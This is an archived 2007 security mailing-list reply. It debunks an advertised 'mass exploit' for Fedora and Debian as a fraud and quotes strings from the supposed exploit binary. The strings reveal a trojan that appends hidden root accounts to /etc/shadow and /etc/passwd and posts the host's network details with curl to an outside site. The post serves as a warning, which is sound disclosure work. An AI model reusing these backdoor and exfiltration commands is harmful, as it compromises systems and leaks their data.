[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Found nice mass exploits for fedora and imap

To: linux0day@xxxxxxxxxxx
Subject: Re: Found nice mass exploits for fedora and imap
From: Jon Lewis <jlewis@xxxxxxxxx>
Date: Tue, 28 Aug 2007 11:24:15 -0400 (EDT)

On Mon, 28 Aug 2007 linux0day@xxxxxxxxxxx wrote:

Hello bugtraq,
Did somebody realize a new mass exploits is realeased to public, it's seems 
work for fedora core 5, 6 and debian 3.1 with exploiting apache and imap.

I've found this link somedays ago in a security forum, check this out

http://rufy.com/images/mass/


Looks like a fraud to me.  Nice try.

^M^@pache^@IMAP4rev1^@^@^@^@Root priviledge is needed - use your root userOK!^@r^@target.txt^@^@^@^@Rename your target list filename totarget.txt^@/etc/shadow^@^@newbie:$1$nLv4Q0aJ$rV4IkBgFH1NMo/HzHX35u/^@^@^@echotoor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow^@^@^@^@echonewbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow^@^@echotoor:x:0:0:toor:/var:/bin/sh >> /etc/passwd^@^@^@^@echonewbie:x:10000:65534:toor:/var/tmp:/bin/sh >>/etc/passwd^@/usr/bin/curl^@^@^@^@/usr/bin/curl -d"user=newbie&pass=novice&target=$(ifconfig -a)"http://www.trancefix.org/hell/save.php > /dev/null2&>/dev/null^@^@^@^@Trying to connect to %s port %d




----------------------------------------------------------------------
 Jon Lewis                   |  I route
 Senior Network Engineer     |  therefore you are
 Atlantic Net                |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

References:
- Found nice mass exploits for fedora and imap
  - From: linux0day

Prev by Date: Re: Found nice mass exploits for fedora and imap
Next by Date: n.runs, Sophos, German laws, and customer safety
Previous by thread: Re: Found nice mass exploits for fedora and imap
Next by thread: n.runs, Sophos, German laws, and customer safety
Index(es):
- Date
- Thread